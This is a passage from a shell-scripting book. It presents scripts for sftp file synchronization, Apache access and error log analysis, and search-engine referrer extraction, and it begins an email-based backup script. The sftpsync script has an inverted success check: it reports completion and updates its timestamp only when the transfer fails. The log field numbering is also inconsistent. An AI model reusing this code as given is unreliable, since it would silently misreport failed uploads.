each new local subdirectory and reinvoke ftpsyncdown.
As with the suggested solution to a similar directory problem in Script #81, if you have ncftp you'll find that it has
built-in support for recursive get commands. Rewriting this script to utilize that ncftp capability makes a lot more
sense than continuing to struggle with the more primitive ftp command.
For a brief note on when to rewrite shell scripts in a "real" programming language, see the "Hacking the Script" section
in Script #81.

#83 Synchronizing Files with SFTP


While the ftp program is quite widely available, it's really something you should avoid like the plague. There are two
reasons for this. First, ftp servers are notorious for being buggy and having security holes, and second, and much
more problematic, ftp transfers all data between the server and client in the clear. This means that when you transmit
files to your server, your account name and password are sent along without any encryption, making it relatively trivial
for someone with a packet sniffer to glean this vital information. That's bad. Very bad.
Instead, all modern servers should support the considerably more secure ssh (secure shell) package, a login and file
transfer pair that supports end-to-end encryption. The file transfer element of the encrypted transfer is sftp, and it's
even more primitive than ftp, but we can still rewrite ftpsyncup to work with sftp, as shown in this script.
Downloading an ssh package

If you don't have ssh on your system, complain to your vendor and administrative
team. There's no excuse. You can also obtain the package and install it yourself by
starting at http://www.openssh.com/

The Code
#!/bin/sh

# sftpsync - Given a target directory on an sftp server, makes sure that
#    all new or modified files are uploaded to the remote system. Uses
#    a timestamp file ingeniously called .timestamp to keep track.

timestamp=".timestamp"
tempfile="/tmp/sftpsync.$$"
count=0

trap "/bin/rm -f $tempfile" 0 1 15     # zap tempfile on exit & sigs

if [ $# -eq 0 ] ; then
  echo "Usage: $0 user@host { remotedir }" >&2
  exit 1
fi

user="$(echo $1 | cut -d@ -f1)"
server="$(echo $1 | cut -d@ -f2)"

if [ $# -gt 1 ] ; then
  echo "cd $2" >> $tempfile
fi

if [ ! -f $timestamp ] ; then
  # no timestamp file, upload all files
  for filename in *
  do
    if [ -f "$filename" ] ; then
      echo "put -P \"$filename\"" >> $tempfile
      count=$(($count + 1))
    fi
  done
else
  for filename in $(find . -newer $timestamp -type f -print)
  do
    echo "put -P \"$filename\"" >> $tempfile
    count=$(($count + 1))
  done
fi

if [ $count -eq 0 ] ; then
  echo "$0: No files require uploading to $server" >&2
  exit 1
fi

echo "quit" >> $tempfile

echo "Synchronizing: Found $count files in local folder to upload."

if ! sftp -b $tempfile "$user@$server" ; then
  echo "Done. All files synchronized up with $server"
  touch $timestamp
fi

exit 0

How It Works
Like ftp, sftp allows a series of commands to be fed to it as a pipe or input redirect, which makes this script rather
simple to write: Almost the entire script focuses on building the sequence of commands necessary to upload changed
files. At the end, the sequence of commands is fed to the sftp program for execution.
As with Scripts #81 and #82, if you have a version of sftp that doesn't properly return a nonzero failure code to the
shell when a transfer fails, simply remove the conditional block at the end of the script, leaving only
sftp -b $tempfile "$user@$server"
touch $timestamp
Because sftp requires the account to be specified as user@host, it's actually a bit simpler than the equivalent
ftp script shown in Script #81, ftpsyncup. Also notice the -P flag added to the put commands; it causes sftp to
retain the local permission, creation, and modification times for all files transferred.
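To make the batch-file mechanism concrete, here's a sketch that builds the same kind of command file sftpsync feeds to sftp -b. The user, server, and filename are invented, and the actual sftp invocation is left commented out so the sketch runs anywhere:

```shell
#!/bin/sh
# Build an sftp batch file like the one sftpsync generates.
tempfile=$(mktemp)
user="taylor" ; server="example.com"     # hypothetical account and host

echo "cd /wicked/scripts"         >  "$tempfile"
echo 'put -P "./003-normdate.sh"' >> "$tempfile"
echo "quit"                       >> "$tempfile"

cat "$tempfile"

# The real script would now hand the batch file to sftp:
#   sftp -b "$tempfile" "$user@$server"

rm -f "$tempfile"
```

Everything sftp does on the connection is driven by those three lines, which is why the script spends nearly all of its effort assembling $tempfile.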

Running the Script


This script is simple to run: Move into the local source directory, ensure that the target directory exists, and invoke the
script with your username, server name, and remote directory. For simple situations, I have an alias called ssync
(source sync) that moves into the directory I need to keep in sync and invokes sftpsync automatically:
alias ssync="sftpsync taylor@intuitive.com /wicked/scripts"
The "Hacking the Script" section shows a more sophisticated wrapper that makes the synchronization script even more
helpful.

The Results
$ sftpsync taylor@intuitive.com /wicked/scripts
Synchronizing: Found 2 files in local folder to upload.
Connecting to intuitive.com...
taylor@intuitive.com's password:
sftp> cd /wicked/scripts
sftp> put -P "./003-normdate.sh"
Uploading ./003-normdate.sh to /usr/home/taylor/usr/local/etc/httpd/htdocs/
intuitive/wicked/scripts/003-normdate.sh
sftp> put -P "./004-nicenumber.sh"
Uploading ./004-nicenumber.sh to /usr/home/taylor/usr/local/etc/httpd/htdocs/
intuitive/wicked/scripts/004-nicenumber.sh
sftp> quit
Done. All files synchronized up with intuitive.com

Hacking the Script


The wrapper script that I use to invoke sftpsync is a tremendously useful script, and I have used it throughout the
development of this book to ensure that the copies of the scripts in the web archive (see
http://www.intuitive.com/wicked/) are exactly in sync with those on my own servers, all the while
adroitly sidestepping the insecurities of the ftp protocol.
This wrapper, ssync, contains all the necessary logic for moving to the right local directory (see the variable
localsource) and creating a file archive that has the latest versions of all the files in a so-called tarball (named for
the tar, tape archive, command that's used to build it). The last line of the script calls sftpsync:
#!/bin/sh

# ssync - If anything's changed, creates a tarball and syncs a remote
#    directory via sftp using sftpsync.

sftpacct="taylor@intuitive.com"
tarballname="AllFiles.tgz"
localsource="$HOME/Desktop/Wicked Cool Scripts/scripts"
remotedir="/wicked/scripts"
timestamp=".timestamp"
count=0
sftpsync="$HOME/bin/sftpsync"

# First off, let's see if the local dir exists and has files

if [ ! -d "$localsource" ] ; then
  echo "$0: Error: directory $localsource doesn't exist?" >&2
  exit 1
fi

cd "$localsource"

# Now let's count files to ensure something's changed:

if [ ! -f $timestamp ] ; then
  for filename in *
  do
    if [ -f "$filename" ] ; then
      count=$(($count + 1))
    fi
  done
else
  count=$(find . -newer $timestamp -type f -print | wc -l)
fi

if [ $count -eq 0 ] ; then
  echo "$(basename $0): No files found in $localsource to sync with remote."; exit 0
fi

echo "Making tarball archive file for upload"
tar -czf $tarballname ./*

# Done! Now let's switch to the sftpsync script

exec $sftpsync $sftpacct $remotedir
With one command, a new archive file is created, if necessary, and all files (including the new archive, of course) are
uploaded to the server as needed:
$ ssync
Making tarball archive file for upload
Synchronizing: Found 2 files in local folder to upload.
Connecting to intuitive.com...
taylor@intuitive.com's password:
sftp> cd shellhacks/scripts
sftp> put -P "./AllFiles.tgz"
Uploading ./AllFiles.tgz to shellhacks/scripts/AllFiles.tgz
sftp> put -P "./ssync"
Uploading ./ssync to shellhacks/scripts/ssync
sftp> quit
Done. All files synchronized up with intuitive.com
This script can doubtless be hacked further. One obvious tweak would be to have ssync invoked from a cron job
every few hours during the work day so that the files on a remote backup server are invisibly synchronized to your
local files without any human intervention.
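A crontab entry for that might look like the following sketch. The schedule and paths are assumptions (and the every-two-hours step syntax is a Vixie cron extension); adjust both for your own installation:

```shell
#!/bin/sh
# Sketch: print a crontab line that runs ssync every two hours,
# 9am-5pm, Monday through Friday (hypothetical path and log file).
entry='0 9-17/2 * * 1-5 $HOME/bin/ssync >> $HOME/ssync.log 2>&1'
echo "$entry"

# To install it for real (not executed here):
#   ( crontab -l 2>/dev/null ; echo "$entry" ) | crontab -
```

Because ssync exits quietly when nothing has changed, an aggressive schedule like this costs almost nothing between edits.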

Chapter 10: Internet Server Administration


Many Linux, Unix, and Mac OS X readers wear several hats in their jobs, webmaster and web server administrator
being just two of them. For others working on larger systems, the job of managing the server and service is completely
separate from the job of designing and managing actual content on the website, FTP server, and so forth.
Chapter 9, "Website Administration," offered tools geared primarily toward webmasters and other content managers.
This chapter, by contrast, shows how to analyze web server log files, mirror websites, monitor FTP usage and network
health, and even add new virtual host accounts to allow additional domains to be served up from an existing web
server.

#84 Exploring the Apache access_log


If you're running Apache or a similar web server that uses the Common Log Format, there's quite a bit of quick
statistical analysis that can be done with a shell script. The standard configuration for a server has an access_log
and error_log written for the site; even ISPs make these raw data files available to customers, but if you've got
your own server, you should definitely have and be archiving this valuable information.
Table 10-1 lists the columns in an access_log.
Table 10-1: Field values in the access_log file

Column    Value
1         IP of host accessing the server
2-3       Security information for https/SSL connections
4         Date and time zone offset of the specific request
5         Method invoked
6         URL requested
7         Protocol used
8         Result code
9         Number of bytes transferred
10        Referrer
11        Browser identification string

A typical line in an access_log looks like the following:

63.203.109.38 - - [02/Sep/2003:09:51:09 -0700] "GET /custer HTTP/1.1" 301 248
"http://search.msn.com/results.asp?RS=CHECKED&FORM=MSNH&
v=1&q=%22little+big+Horn%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
The result code (field 8) of 301 indicates a permanent redirect: The request was handled, but the visitor was
forwarded to another URL. The referrer (field 10) indicates the URL of the page that the surfer
was visiting immediately prior to the page request on this site: You can see that the user was at search.msn.com
(MSN) and searched for "little big Horn." The results of that search included a link to the /custer URL on this
server.
The number of hits to the site can be quickly ascertained by doing a word count on the log file, and the date range of
entries in the file can be ascertained by comparing the first and last lines therein:
$ wc -l access_log
   10991 access_log
$ head -1 access_log ; tail -1 access_log
64.12.96.106 - - [13/Sep/2003:18:02:54 -0600] ...
216.93.167.154 - - [15/Sep/2003:16:30:29 -0600] ...
With these points in mind, here's a script that produces a number of useful statistics, given an Apache-format
access_log log file.

The Script

#!/bin/sh

# webaccess - Analyzes an Apache-format access_log file, extracting
#    useful and interesting statistics.

bytes_in_mb=1048576

# You might need to adjust the following two to ensure that they point
# to these scripts on your system (or just ensure they're in your PATH)

scriptbc="$HOME/bin/scriptbc"         # from Script #9
nicenumber="$HOME/bin/nicenumber"     # from Script #4

# You will also want to change the following to match your own hostname
# to help weed out internally referred hits in the referrer analysis.

host="intuitive.com"

if [ $# -eq 0 ] ; then
  echo "Usage: $(basename $0) logfile" >&2
  exit 1
fi

if [ ! -r "$1" ] ; then
  echo "Error: log file $1 not found." >&2
  exit 1
fi

firstdate="$(head -1 "$1" | awk '{print $4}' | sed 's/\[//')"
lastdate="$(tail -1 "$1" | awk '{print $4}' | sed 's/\[//')"

echo "Results of analyzing log file $1"
echo ""
echo "  Start date: $(echo $firstdate | sed 's/:/ at /')"
echo "    End date: $(echo $lastdate | sed 's/:/ at /')"

hits="$(wc -l < "$1" | sed 's/[^[:digit:]]//g')"

echo "        Hits: $($nicenumber $hits) (total accesses)"

pages="$(grep -ivE '(.txt|.gif|.jpg|.png)' "$1" | wc -l | sed 's/[^[:digit:]]//g')"

echo "  Page views: $($nicenumber $pages) (hits minus graphics)"

totalbytes="$(awk '{sum+=$10} END {print sum}' "$1")"

echo -n " Transferred: $($nicenumber $totalbytes) bytes "

if [ $totalbytes -gt $bytes_in_mb ] ; then
  echo "($($scriptbc $totalbytes / $bytes_in_mb) MB)"
elif [ $totalbytes -gt 1024 ] ; then
  echo "($($scriptbc $totalbytes / 1024) KB)"
else
  echo ""
fi

# Now let's scrape the log file for some useful data:

echo ""
echo "The ten most popular pages were:"

awk '{print $7}' "$1" | grep -ivE '(.gif|.jpg|.png)' | \
  sed 's/\/$//g' | sort | \
  uniq -c | sort -rn | head -10

echo ""
echo "The ten most common referrer URLs were:"

awk '{print $11}' "$1" | \
  grep -vE "(^\"-\"$|/www.$host|/$host)" | \
  sort | uniq -c | sort -rn | head -10

echo ""
exit 0

How It Works
Although this script looks complex, it's not. It's easier to see this if we consider each block as a separate little script. For
example, the first few lines extract the firstdate and lastdate by simply grabbing the fourth field of the first
and last lines of the file. The number of hits is calculated by counting lines in the file (using wc), and the number of
page views is simply hits minus requests for image files or raw text files (that is, files with .gif, .jpg, .png, or
.txt as their extension). Total bytes transferred is calculated by summing up the value of the tenth field in each line
and then invoking nicenumber to present it attractively.
The most popular pages can be calculated by extracting just the pages requested from the log file; screening out any
image files; sorting, using uniq -c to calculate the number of occurrences of each unique line; and finally sorting
one more time to ensure that the most commonly occurring lines are presented first. In the code, it looks like this:
awk '{print $7}' "$1" | grep -ivE '(.gif|.jpg|.png)' | \
  sed 's/\/$//g' | sort | \
  uniq -c | sort -rn | head -10
Notice that we do normalize things a little bit: The sed invocation strips out any trailing slashes, to ensure that
/subdir/ and /subdir are counted as the same request.
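The effect of that normalization can be seen on a few sample paths:

```shell
#!/bin/sh
# Trailing-slash normalization: /custer/ and /custer collapse together,
# so uniq -c counts them as one page.
printf '%s\n' "/custer/" "/custer" "/blog/" |
  sed 's/\/$//g' |
  sort | uniq -c
```

The two /custer variants are counted together (a count of 2), while /blog gets a count of 1; without the sed step they would appear as three separate entries.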
Similar to the section that retrieves the ten most requested pages, the following section pulls out the referrer
information:
awk '{print $11}' "$1" | \
  grep -vE "(^\"-\"$|/www.$host|/$host)" | \
  sort | uniq -c | sort -rn | head -10
This extracts field 11 from the log file, screening out both entries that were referred from the current host and entries
that are "-" (the value sent when the web browser is blocking referrer data), and then feeds the result to the same
sequence of sort|uniq -c|sort -rn|head -10 to get the ten most common referrers.

Running the Script


To run this script, specify the name of an Apache (or other Common Log Format) log file as its only argument.

The Results
The result of running this script on a typical log file is quite informative:
$ webaccess /web/logs/intuitive/access_log
Results of analyzing log file /web/logs/intuitive/access_log

  Start date: 13/Sep/2003 at 18:02:54
    End date: 15/Sep/2003 at 16:39:21
        Hits: 11,015 (total accesses)
  Page views: 4,217 (hits minus graphics)
 Transferred: 64,091,780 bytes (61.12 MB)

The ten most popular pages were:
    862 /blog/index.rdf
    327 /robots.txt
    266 /blog/index.xml
    183
    115 /custer
     96 /blog/styles-site.css
     93 /blog
     68 /cgi-local/etymologic.cgi
     66 /origins
     60 /coolweb

The ten most common referrer URLs were:
     96 "http://booktalk.intuitive.com/"
     18 "http://booktalk.intuitive.com/archives/cat_html.shtml"
     13 "http://search.msn.com/results.asp?FORM=MSNH&v=1&q=little+big+horn"
     12 "http://www.geocities.com/capecanaveral/7420/voc1.html"
     10 "http://search.msn.com/spresults.aspx?q=plains&FORM=IE4"
      9 "http://www.etymologic.com/index.cgi"
      8 "http://www.allwords.com/12wlinks.php"
      7 "http://www.sun.com/bigadmin/docs/"
      7 "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=cool+web+pages"
      6 "http://www.google.com/search?oe=UTF-8&q=html+4+entities"

Hacking the Script


One challenge of analyzing Apache log files is that there are situations in which two different URLs actually refer to the
same page. For example, /custer/ and /custer/index.shtml are the same page, so the calculation of the
ten most popular pages really should take that into account. The conversion performed by the sed invocation already
ensures that /custer and /custer/ aren't treated separately, but knowing the default filename for a given
directory might be a bit trickier.
The usefulness of the analysis of the ten most popular referrers can be enhanced by trimming referrer URLs to just the
base domain name (e.g., slashdot.org). Script #85, Understanding Search Engine Traffic, explores additional
information available from the referrer field.
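A sketch of that trimming, using the same cut/rev idiom that Script #85 employs for its searchengine variable (the sample URLs are invented, and the keep-the-last-two-components heuristic misfires on country-code domains such as .co.uk):

```shell
#!/bin/sh
# Reduce full referrer URLs to a base domain: keep the hostname,
# then keep only its last two dot-separated components.
printf '%s\n' \
  'http://search.msn.com/results.asp?q=custer' \
  'http://www.google.com/search?q=shell' |
  cut -d/ -f3 |
  rev | cut -d. -f1-2 | rev
```

The two sample URLs collapse to msn.com and google.com, so all referrals from a given site would be counted together regardless of which page they came from.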

#85 Understanding Search Engine Traffic


Script #84, Exploring the Apache access_log, can offer a broad-level overview of some of the search engine queries
that point to your site, but further analysis can reveal not just which search engines are delivering traffic, but what
keywords were entered by users who arrived at your site via search engines. This information can be invaluable for
understanding whether your site has been properly indexed by the search engines and can provide the starting point
for improving the rank and relevancy of your search engine listings.

The Code
#!/bin/sh

# searchinfo - Extracts and analyzes search engine traffic indicated in the
#    referrer field of a Common Log Format access log.

host="intuitive.com"      # change to your domain, as desired
maxmatches=20
count=0
temp="/tmp/$(basename $0).$$"

trap "/bin/rm -f $temp" 0

if [ $# -eq 0 ] ; then
  echo "Usage: $(basename $0) logfile" >&2
  exit 1
fi

if [ ! -r "$1" ] ; then
  echo "Error: can't open file $1 for analysis." >&2
  exit 1
fi

for URL in $(awk '{ if (length($11) > 4) { print $11 } }' "$1" | \
  grep -vE "(/www.$host|/$host)" | grep '?')
do
  searchengine="$(echo $URL | cut -d/ -f3 | rev | cut -d. -f1-2 | rev)"
  args="$(echo $URL | cut -d\? -f2 | tr '&' '\n' | \
    grep -E '(^q=|^sid=|^p=|query=|item=|ask=|name=|topic=)' | \
    sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/"//g' | cut -d= -f2)"

  if [ ! -z "$args" ] ; then
    echo "${searchengine}:  $args" >> $temp
  else
    # No well-known match, show entire GET string instead...
    echo "${searchengine}  $(echo $URL | cut -d\? -f2)" >> $temp
  fi
  count="$(($count + 1))"
done

echo "Search engine referrer info extracted from ${1}:"

sort $temp | uniq -c | sort -rn | head -$maxmatches | sed 's/^/  /g'

echo ""

echo Scanned $count entries in log file out of $(wc -l < "$1") total.

exit 0

How It Works
The main for loop of this script extracts all entries in the log file that have a valid referrer with a string length greater
than 4, a referrer domain that does not match the $host variable, and a ? in the referrer string (indicating that a user
search was performed):

for URL in $(awk '{ if (length($11) > 4) { print $11 } }' "$1" | \
  grep -vE "(/www.$host|/$host)" | grep '?')

The script then goes through various steps in the ensuing lines to identify the domain name of the referrer and the
search value entered by the user:

searchengine="$(echo $URL | cut -d/ -f3 | rev | cut -d. -f1-2 | rev)"
args="$(echo $URL | cut -d\? -f2 | tr '&' '\n' | \
  grep -E '(^q=|^sid=|^p=|query=|item=|ask=|name=|topic=)' | \
  sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/"//g' | cut -d= -f2)"

An examination of hundreds of search queries shows that common search sites use a small number of common
variable names. For example, search on Yahoo.com and your search string is p=pattern. Google and MSN use
q as the search variable name. The grep invocation contains p, q, and the other most common search variable
names.
The invocation of sed cleans up the resultant search patterns, replacing + and %20 sequences with
spaces and chopping quotes out, and then the cut command returns everything that occurs after the first equal
sign (=): in other words, just the search terms.
The conditional immediately following these lines tests to see if the args variable is empty or not. If it is (that is, if the
query format isn't a known format), then it's a search engine we haven't seen, so we output the entire pattern rather
than a cleaned-up pattern-only value.
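To see these steps concretely, here is one invented Google referrer walked through the same pipeline:

```shell
#!/bin/sh
# Extract the search terms from a single sample referrer URL, using the
# same cut/tr/grep/sed steps as searchinfo.
URL="http://www.google.com/search?hl=en&q=cool+web+pages"
args="$(echo $URL | cut -d\? -f2 | tr '&' '\n' | \
  grep -E '(^q=|^sid=|^p=|query=|item=|ask=|name=|topic=)' | \
  sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/"//g' | cut -d= -f2)"
echo "$args"    # cool web pages
```

The tr turns the &-separated CGI arguments into one per line so that grep can pick out just the search-variable line.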

Running the Script


To run this script, simply specify the name of an Apache or other Common Log Format log file on the command line.
Speed warning!

This is one of the slowest scripts in this book, because it's spawning lots and lots of
subshells to perform various tasks, so don't be surprised if it takes a while to run.

The Results
$ searchinfo /web/logs/intuitive/access_log
Search engine referrer info extracted from /web/logs/intuitive/access_log:
  19 msn.com:      little big horn
  14 msn.com:      custer
  11 google.com:   cool web pages
  10 msn.com:      plains
   9 msn.com:      Little Big Horn
   9 google.com:   html 4 entities
   6 msn.com:      Custer
   4 msn.com:      the plains indians
   4 msn.com:      little big horn battlefield
   4 msn.com:      Indian Wars
   4 google.com:   newsgroups
   3 yahoo.com:    cool web pages
   3 ittoolbox.com i=1186"
   3 google.it:    jungle book kipling plot
   3 google.com:   cool web graphics
   3 google.com:   colored bullets CSS
   2 yahoo.com:    unix%2Bhogs
   2 yahoo.com:    cool HTML tags
   2 msn.com:      www.custer.com

Scanned 466 entries in log file out of 11406 total.

Hacking the Script


You can tweak this script in a variety of ways to make it more useful. One obvious one is to skip the referrer URLs that
are (most likely) not from search engines. To do so, simply comment out the else clause in the following passage:

if [ ! -z "$args" ] ; then
  echo "${searchengine}:  $args" >> $temp
else
  # No well-known match, show entire GET string instead...
  echo "${searchengine}  $(echo $URL | cut -d\? -f2)" >> $temp
fi

To be fair, ex post facto analysis of search engine traffic is difficult. Another way to approach this task would be to
search for all hits coming from a specific search engine, entered as the second command argument, and then to
compare the search strings specified. The core for loop would change, but, other than a slight tweak to the usage
message, the script would be identical to the searchinfo script:

for URL in $(awk '{ if (length($11) > 4) { print $11 } }' "$1" | \
  grep $2)
do
  args="$(echo $URL | cut -d\? -f2 | tr '&' '\n' | \
    grep -E '(^q=|^sid=|^p=|query=|item=|ask=|name=|topic=)' | \
    cut -d= -f2)"
  echo $args | sed -e 's/+/ /g' -e 's/"//g' >> $temp
  count="$(($count + 1))"
done
The results of this new version, given google.com as an argument, are as follows:

$ enginehits /web/logs/intuitive/access_log google.com
Search engine referrer info extracted google searches from
/web/logs/intuitive/access_log:
  13 cool web pages
  10
   9 html 4 entities
   4 newsgroups
   3 solaris 9
   3 jungle book kipling plot
   3 intuitive
   3 cool web graphics
   3 colored bullets CSS
   2 sun solaris operating system reading material
   2 solaris unix
   2 military weaponry
   2 how to add program to sun solaris menu
   2 dynamic html border
   2 Wallpaper Nikon
   2 HTML for heart symbol
   2 Cool web pages
   2 %22Military weaponry%22
   1 www%2fvoices.com
   1 worst garage door opener
   1 whatis artsd
   1 what%27s meta tag

Scanned 232 google entries in log file out of 11481 total.
If most of your traffic comes from a few search engines, you could analyze those engines separately and then list all
traffic from other search engines at the end of the output.
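A minimal sketch of that per-engine counting, run over a tiny invented sample log (field 11 is the referrer in Common Log Format); the real version would loop over your full log with the script above:

```shell
#!/bin/sh
# Count referrer hits per engine over a small invented sample log.
cat > sample.log << 'EOF'
h - - [01/Jan/2003:00:00:00 -0700] "GET / HTTP/1.0" 200 1 "http://www.google.com/search?q=custer"
h - - [01/Jan/2003:00:00:00 -0700] "GET / HTTP/1.0" 200 1 "http://search.msn.com/results.asp?q=custer"
h - - [01/Jan/2003:00:00:00 -0700] "GET / HTTP/1.0" 200 1 "http://www.google.com/search?q=plains"
EOF
for engine in google.com msn.com
do
  hits="$(awk '{print $11}' sample.log | grep -c "$engine")"
  echo "$engine: $hits hits"
done
rm -f sample.log
```

A final pass with grep -v over the whole engine list would gather the remaining "other" traffic.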

#86 Exploring the Apache error_log


Just as Script #84, Exploring the Apache access_log, reveals the interesting and useful statistical information found in
the regular access log of an Apache or Apache-compatible web server, this script extracts the critical information from
the error_log.
For those web servers that don't automatically split their log file into separate access_log and error_log
components, you can sometimes split a central log file into access and error components by filtering based on the
return code (field 9) of each entry in the log:

awk '{ if (substr($9,0,1) <= "3") { print $0 } }' apache.log > access_log
awk '{ if (substr($9,0,1)  > "3") { print $0 } }' apache.log > error_log
A return code that begins with a 4 or a 5 is a failure (the 400s are client errors, the 500s are server errors), and a
return code beginning with a 2 or a 3 is a success (the 200s are success messages, the 300s are redirects).
Other servers that produce a single central log file containing both successes and errors denote the error message
entries with an [error] field value. In that case, the split can be done with grep '\[error\]' to create the
error_log and grep -v '\[error\]' to create the access_log (the brackets are escaped so that grep
matches them literally rather than treating them as a character class).
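That grep-based split, sketched with a two-line invented log:

```shell
#!/bin/sh
# Split a combined log into error and access portions on the [error] marker.
cat > apache.log << 'EOF'
10.0.0.1 - - [16/Jan/2003:20:03:12] "GET / HTTP/1.0" 200 1024
[Thu Jan 16 20:03:12 2003] [error] [client 10.0.0.2] File does not exist: /favicon.ico
EOF
grep '\[error\]' apache.log > error_log
grep -v '\[error\]' apache.log > access_log
echo "errors: $(grep -c . error_log), accesses: $(grep -c . access_log)"
rm -f apache.log error_log access_log
```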
Whether your server automatically creates an error_log or you have to create your own error log by searching for
entries with the '[error]' string, in the error log just about everything is different, including the way the date is
specified:

$ head -1 error_log
[Thu Jan  2 10:07:07 2003] [error] [client 208.180.31.244] File does
not exist: /usr/local/etc/httpd/htdocs/intuitive/favicon.ico

In the access_log, dates are specified as a compact one-field value with no spaces, but the error_log takes
five fields instead. Further, rather than a consistent scheme in which the word/string position in a space-delimited entry
consistently identifies a particular field, entries in the error_log have a meaningful error description that varies in
length. An examination of just those description values reveals surprising variation:
$ awk '{print $9" "$10" "$11" "$12}' error_log | sort -u
File does not exist:
Invalid error redirection directive:
Premature end of script
execution failure for parameter
premature EOF in parsed
script not found or
malformed header from script
Some of these errors should be examined by hand because they can be difficult to track backward to the offending
web page once identified. Others are just transient problems:

[Thu Jan 16 20:03:12 2003] [error] [client 205.188.209.101] (35)
Resource temporarily unavailable: couldn't spawn include command
/usr/home/taylor/web/intuitive/library/header.cgi: Cannot fork:
Resource temporarily unavailable

This script focuses on the most common problems (in particular, "File does not exist" errors) and then produces a
dump of all other error_log entries that don't match well-known error situations.

The Code
#!/bin/sh

# weberrors - Scans through an Apache error_log file and reports the
#    most important errors, then lists additional entries.

temp="/tmp/$(basename $0).$$"

# The following three lines will need to be customized for your own
# installation for this script to work best.

htdocs="/usr/local/etc/httpd/htdocs/"
myhome="/usr/home/taylor/"
cgibin="/usr/local/etc/httpd/cgi-bin/"

sedstr="s/^/  /g;s|$htdocs|[htdocs] |;s|$myhome|[homedir] |;s|$cgibin|[cgi-bin] |"

screen="(File does not exist|Invalid error redirect|premature EOF|Premature end of script|script not found)"

length=5      # entries per category to display

checkfor()
{
  grep "${2}:" "$1" | awk '{print $NF}' | \
    sort | uniq -c | sort -rn | head -$length | sed "$sedstr" > $temp

  if [ $(wc -l < $temp) -gt 0 ] ; then
    echo ""
    echo "$2 errors:"
    cat $temp
  fi
}

trap "/bin/rm -f $temp" 0

if [ "$1" = "-l" ] ; then
  length=$2; shift 2
fi

if [ $# -ne 1 -o ! -r "$1" ] ; then
  echo "Usage: $(basename $0) [-l len] error_log" >&2
  exit 1
fi

echo Input file $1 has $(wc -l < "$1") entries.

start="$(grep -E '\[.*:.*:.*\]' "$1" | head -1 | awk '{print $1" "$2" "$3" "$4" "$5}')"
end="$(grep -E '\[.*:.*:.*\]' "$1" | tail -1 | awk '{print $1" "$2" "$3" "$4" "$5}')"

echo -n "Entries from $start to $end"
echo ""

### Check for various common and well-known errors:

checkfor "$1" "File does not exist"
checkfor "$1" "Invalid error redirection directive"
checkfor "$1" "premature EOF"
checkfor "$1" "script not found or unable to stat"
checkfor "$1" "Premature end of script headers"

grep -vE "$screen" "$1" | grep "\[error\]" | grep "\[client " | \
  sed 's/\[error\]/`/' | cut -d'`' -f2 | cut -d' ' -f4- | \
  sort | uniq -c | sort -rn | sed 's/^/  /' | head -$length > $temp

if [ $(wc -l < $temp) -gt 0 ] ; then
  echo ""
  echo "Additional error messages in log file:"
  cat $temp
fi

echo ""
echo "And non-error messages occurring in the log file:"

grep -vE "$screen" "$1" | grep -v "\[error\]" | \
  sort | uniq -c | sort -rn | \
  sed 's/^/  /' | head -$length

exit 0

How It Works
This script works by scanning the error_log for the five errors specified in the calls to the checkfor function,
extracting the last field on each error line with an awk call for $NF (NF represents the number of fields in that
particular input line). This output is then fed through the common sort | uniq -c | sort -rn sequence to allow
the extraction of the most commonly occurring errors for that category of problem.
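The sort | uniq -c | sort -rn sequence is worth internalizing; here it is on toy input:

```shell
#!/bin/sh
# sort groups identical lines together, uniq -c prefixes each group with
# its count, and sort -rn puts the most frequent first.
printf '%s\n' apple banana apple cherry apple banana | \
  sort | uniq -c | sort -rn
# The most frequent line (apple, count 3) prints first.
```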

To ensure that only those error types with matches are shown, each specific error search is saved to the temporary
file, which is then tested for contents before a message is output. This is all neatly done with the checkfor function
that appears near the top of the script.
The last few lines of the script are perhaps the most complex. First they identify the most common errors not otherwise
checked for by the script that are still in standard Apache error log format. The following grep invocations are part of
a longer pipe:

grep -vE "$screen" "$1" | grep "\[error\]"

Then the script identifies the most common errors not otherwise checked for by the script that don't occur in standard
Apache error log format. Again, the following grep invocations are part of a longer pipe:

grep -vE "$screen" "$1" | grep -v "\[error\]"

Running the Script


This script should be fed a standard Apache-format error log as its only argument. If invoked with an -l length
argument, it'll display length matches per error type checked rather than the default of five entries per
error type.

The Results
$ weberrors error_log
Input file error_log has 1040 entries.
Entries from [Sat Aug 23 18:10:21 2003] to [Sat Aug 30 17:23:38 2003]

File does not exist errors:
  24 [htdocs] intuitive/coolweb/Graphics/Graphics/off.gif
  19 [htdocs] intuitive/taylor/Graphics/biohazard.gif
  19 [homedir] public_html/tyu/tyu-toc.html
  14 [htdocs] intuitive/Graphics/bottom-menu.gif
  12 [htdocs] intuitive/tmp/rose-ceremony/spacer.gif

Invalid error redirection directive errors:
  23 index.html

script not found or unable to stat errors:
  55 [htdocs] intuitive/coolweb/apps/env.cgi
   4 [htdocs] intuitive/cgi-local/apps/env.cgi
   4 [cgi-bin] FormMail.pl
   3 [htdocs] intuitive/origins/playgame.cgi

Additional error messages in log file:
   5 (35)Resource temporarily unavailable: couldn't spawn include command
   4 unknown parameter "src" to tag include in
     /usr/local/etc/httpd/htdocs/intuitive/tmp/ECR0803b.shtml
   4 execution failure for parameter "cmd" to tag exec in file
     /usr/local/etc/httpd/htdocs/intuitive/library/footer.shtml
   1 execution failure for parameter "cmd" to tag exec in file
     /usr/local/etc/httpd/htdocs/intuitive/library/WindWillows.shtml

And non-error messages occurring in the log file:
  39 /usr/home/taylor/web/intuitive/library/header.cgi: Cannot fork: Resource
     temporarily unavailable
  20 identify: Missing an image file name.
  17 sort: -: write error: Broken pipe
  16 /web/bin/lastmod: not found
  16 /web/bin/counter: not found

#87 Avoiding Disaster with a Remote Archive


Whether or not you have a good backup strategy, with tape rotation and so forth, it's still a nice insurance policy to
identify a half-dozen critical files and have them sent to a separate off-site archive system. Even if it's just that one key
file that contains customer addresses, invoices, or even email from your sweetheart, having an occasional off-site
archive can save your life when you least expect it.
This sounds more complex than it really is, because as you'll see in this script, the archive is just a file emailed to a
remote mailbox and could even be pointed to a Yahoo! or Hotmail mailbox. The list of files is kept in a separate data
file, with shell wildcards allowed therein. Filenames can contain spaces too, something that rather complicates the
script, as you'll see.

The Code
#!/bin/sh

# remotebackup - Takes a list of files and directories,
#    builds a single archive, compressed, then emails it off to a
#    remote archive site for safekeeping. It's intended to be run
#    every night for critical user files, but not intended to
#    replace a more rigorous backup scheme. You should strongly
